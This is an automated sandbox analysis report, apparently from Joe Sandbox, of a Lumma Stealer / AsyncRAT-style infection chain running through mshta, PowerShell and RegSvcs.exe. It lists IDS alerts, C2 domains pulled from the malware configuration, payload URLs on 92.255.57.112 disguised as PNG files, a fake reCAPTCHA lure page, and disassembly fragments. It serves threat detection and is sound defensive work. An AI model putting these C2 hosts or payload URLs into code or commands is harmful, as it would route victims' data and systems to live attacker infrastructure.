Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbl source: powershell.exe, 00000007.00000002.2407828166.0000022DFF693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdbS{ source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb( source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0BE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2407828166.0000022DFF6E7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb?{ source: powershell.exe, 00000007.00000002.2400988982.0000022DFF04E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \SharpHide-master\SharpHide\obj\Debug\SharpHide.pdb source: powershell.exe, 00000005.00000002.2129677364.0000024B803CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B804A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.2123644838.0000000000402000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2324263951.0000024BF791C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2407828166.0000022DFF682000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2403046872.000001D0F0EE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb` source: powershell.exe, 00000008.00000002.2396199380.000001D0F0C79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\Z:\syscalls\amsi_trace64.amsi.csv.pdb5 source: powershell.exe, 00000007.00000002.2400988982.0000022DFF0EE000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01950C18h	11_2_019509FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov esi, edx	13_2_00408740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp word ptr [eax+ebx+02h], 0000h	13_2_00429871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], cl	13_2_0042E002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [ebx], cl	13_2_0042E002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	13_2_0042A810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp eax	13_2_004288BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	13_2_00402940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+0Eh]	13_2_0040A910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	13_2_004161DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]	13_2_004251E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+32DBB3B0h]	13_2_00427A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push dword ptr [esp+28h]	13_2_00426A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx+05CAF138h]	13_2_0040BA29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	13_2_00438AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [ebx], cx	13_2_0041AA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [esi], cx	13_2_0041AA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea eax, dword ptr [eax+eax*4]	13_2_004082A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push 00000000h	13_2_0040CB44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+2564CAB9h]	13_2_0043EB00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ecx, eax	13_2_00420B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push eax	13_2_00440310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov eax, dword ptr [00448B08h]	13_2_004273A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+1Ch]	13_2_004273A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then lea eax, dword ptr [esp+50h]	13_2_004273A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	13_2_0041DC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [ebx+eax]	13_2_00417451
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	13_2_00407400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	13_2_00407400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 7E3E42A0h	13_2_0043C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then push esi	13_2_0043C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_0042D420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	13_2_00415C25
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	13_2_0042B430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then add ebp, edi	13_2_00408CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [edi], cx	13_2_00426D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edx], cl	13_2_0042DD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [edi+eax]	13_2_0042E5C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	13_2_004165EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [edx+eax]	13_2_00415590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov edx, ecx	13_2_004095A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [esi+04h], eax	13_2_00415E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov word ptr [eax], cx	13_2_00423E44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	13_2_00413E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h	13_2_0040DE72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+79h]	13_2_00425E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+63115D0Dh]	13_2_00425E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	13_2_0043EE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_00408EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	13_2_0041DEB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]	13_2_0041F710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-000000DEh]	13_2_0041F710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh	13_2_004427E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_0042E7EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 13884179h	13_2_0040DFEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_0042F799
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov byte ptr [edi], al	13_2_0042DFAF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2059201 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat) : 192.168.2.5:64755 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059209 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat) : 192.168.2.5:64529 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059211 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat) : 192.168.2.5:56734 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059189 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat) : 192.168.2.5:57853 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059199 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat) : 192.168.2.5:63101 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059203 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat) : 192.168.2.5:57974 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 92.255.57.112:56001 -> 192.168.2.5:49714
Source: Network traffic	Suricata IDS: 2059221 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curtainykeo .lat) : 192.168.2.5:50383 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059207 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat) : 192.168.2.5:58720 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2059191 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat) : 192.168.2.5:58090 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49711 -> 104.102.49.254:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: curtainykeo.lat
Source: Malware configuration extractor	URLs: kickykiduz.lat
Source: Malware configuration extractor	URLs: bloodyswif.lat
Source: Malware configuration extractor	URLs: miniatureyu.lat
Source: Malware configuration extractor	URLs: finickypwk.lat
Source: Malware configuration extractor	URLs: leggelatez.lat
Source: Malware configuration extractor	URLs: shoefeatthe.lat
Source: Malware configuration extractor	URLs: washyceehsu.lat
Source: Malware configuration extractor	URLs: savorraiykj.lat

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: kickykiduz.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: finickypwk.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 198.187.3.20.in-addr.arpa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: miniatureyu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: leggelatez.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: shoefeatthe.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: 56.163.245.4.in-addr.arpa replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: bloodyswif.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: curtainykeo.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: washyceehsu.lat replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: savorraiykj.lat replaycode: Name error (3)

Source: global traffic

TCP traffic: 192.168.2.5:49714 -> 92.255.57.112:56001

Source: global traffic

TCP traffic: 192.168.2.5:51338 -> 162.159.36.2:53

Source: global traffic	HTTP traffic detected: GET /1/2.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1/3.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View	ASN Name: TELSPRU TELSPRU
Source: Joe Sandbox View	ASN Name: TELSPRU TELSPRU

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 104.102.49.254:443

Source: global traffic	HTTP traffic detected: GET /recaptcha-verify.html HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: view-reserve.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112
Source: unknown	TCP traffic detected without corresponding DNS query: 92.255.57.112

Source: global traffic	HTTP traffic detected: GET /recaptcha-verify.html HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: view-reserve.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic	HTTP traffic detected: GET /1/2.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1/3.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /1/1.png HTTP/1.1Host: 92.255.57.112Connection: Keep-Alive

Source: RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=aa43d1ebae0c2f87f653d5ac; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 15 Jan 2025 09:09:13 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: view-reserve.com
Source: global traffic	DNS traffic detected: DNS query: curtainykeo.lat
Source: global traffic	DNS traffic detected: DNS query: bloodyswif.lat
Source: global traffic	DNS traffic detected: DNS query: washyceehsu.lat
Source: global traffic	DNS traffic detected: DNS query: leggelatez.lat
Source: global traffic	DNS traffic detected: DNS query: miniatureyu.lat
Source: global traffic	DNS traffic detected: DNS query: kickykiduz.lat
Source: global traffic	DNS traffic detected: DNS query: savorraiykj.lat
Source: global traffic	DNS traffic detected: DNS query: shoefeatthe.lat
Source: global traffic	DNS traffic detected: DNS query: finickypwk.lat
Source: global traffic	DNS traffic detected: DNS query: steamcommunity.com
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 56.163.245.4.in-addr.arpa

Source: RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.112
Source: powershell.exe, 00000005.00000002.2322554661.0000024BF78C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316180229.0000024BF5AB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2331698058.0000024BF7B5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.112/1/1.png
Source: powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://92.255.57.112/1/1.pngX
Source: mshta.exe, 00000003.00000003.2106417373.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107461816.0000020E2D337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106547656.0000020E2D439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105666148.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079685811.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080358454.0000020E2CD48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107815203.0000020E2D33C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108179750.0000020E2D33E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080226546.0000020E2CCF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079685811.0000020E2D3B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2075726881.0000020E2CE06000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107032290.0000020E2D331000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2107883521.0000020E2D33D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 